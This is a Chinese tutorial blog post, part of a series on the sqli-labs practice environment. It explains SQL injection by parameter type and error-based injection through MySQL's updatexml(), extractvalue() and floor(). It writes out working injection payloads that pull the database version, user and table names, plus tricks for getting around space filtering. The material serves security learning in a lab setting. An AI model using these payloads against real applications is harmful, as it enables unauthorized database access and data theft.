深入浅出带你玩转sqlilabs(四)-updatexml(),floor(),extractvalue()报错注入

SQL各种参数类型下的注入测试

数字型-sqlilabs less2

前面文章已演示过

字符型-sqlilabs less1

前面文章已演示过

搜索型-自写测试

如：

www.test.com/index.php?id=1

www.test.com/index.php?id=abc

（搜索型，一般产生在网站的搜索框）http://www.test.com/search.php?q=1

区分参数类型的原因：

当参数类型为数字时，sql语句拼接可以不用引号或其他符号进行概括，而参数类型为字符串时，sql语句拼接必须使用引号或其他符号进行概括，从而由此分析，在进行sql注入时，如果出现符号，那么注入也要考虑符号的干扰！

本地计算机在进行文件搜索时，会经常使用通配符："*" 星号

在数据库中搜索遍历的通配符："%" 百分号

select * from emails where email_id like '%com%'

从上图可以看出，数据库通配符%和计算机搜索通配符*使用方法差不多

数字型和字符型的SQL语句：

选择库，表

数字型选择列，无单引号

字符型选择列，有单引号

SQL各种报错方式下的注入测试

此类报错注入旨在解决无回显下的注入测试

参考文章：

https://www.wandouip.com/t5i158282/
http://blog.sina.com.cn/s/blog_1450cc4c60102vraq.html

mysql sql语句中空格可以使用"+"，“/**/”等取代

url中绕过空格使用"%20"，"+"，“/**/”等取代

注：MySQL 5.1.5版本后才包含ExtractValue()和UpdateXML()这2个函数

updatexml报错-sqlilabs less5

updatexml()函数是MYSQL对XML文档数据进行查询和修改的XPATH函数

updatexml()函数与extractvalue()类似，是更新xml文档的函数。

语法：updatexml(目标xml文档，xml路径，更新的内容)

如：

select username from security.user where id=1 and (updatexml(‘anything’,’/xx/xx’,’anything’))

报错方式相同：

如：

select username from security.user where id=1 and (updatexml(‘anything’,concat(‘~’,(select database())),’anything’))

可构造如下payload:

?id=1' and 1=(updatexml(1,concat(0x3a,(select version())),1))--+

?id=1' and 1=(updatexml(1,concat(0x3a,(select table_name from information_schema.tables limit 0,1)),1))--+

updatexml的爆错原因很简单，updatexml第二个参数需要的是Xpath格式的字符串。我们输入的显然不符合。故报错由此报错

updatexml的最大长度是32位的，所以有所局限（PS：但是应对大多的已经足够。）

如果密码长度超过了32位就不会被显示出来。

payload分析：

UPDATEXML (XML_document, XPath_string, new_value);

第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc 第二个参数：XPath_string (Xpath格式的字符串) ，如果不了解Xpath语法，可以在网上查找教程。第三个参数：new_value，String格式，替换查找到的符合条件的数据

extractvalue报错-sqlilabs less5

extractvalue()函数也是MYSQL对XML文档数据进行查询和修改的XPATH函数

可构造payload:

?id=1' and extractvalue(1,concat(0x7e,user()))--+

?id=1' and extractvalue(1,concat(0x5c,(select table_name from information_schema.tables limit 1)))--+

payload分析：

ExtractValue(xml_frag, xpath_expr)

ExtractValue()接受两个字符串参数，一个XML标记片段 xml_frag和一个XPath表达式 xpath_expr（也称为定位器）; 它返回CDATA第一个文本节点的text（），该节点是XPath表达式匹配的元素的子元素。

第一个参数可以传入目标xml文档，第二个参数是用Xpath路径法表示的查找路径

例如：SELECT ExtractValue('<a><b><b/></a>', '/a/b'); 就是寻找前一段xml文档内容中的a节点下的b节点，这里如果Xpath格式语法书写错误的话，就会报错。这里就是利用这个特性来获得我们想要知道的内容。

floor报错-sqlilabs less5

构造payload:

?id=1'+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+

?id=-1' and(select 1 from (select count(*),concat((select table_name from information_schema.tables limit 3,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+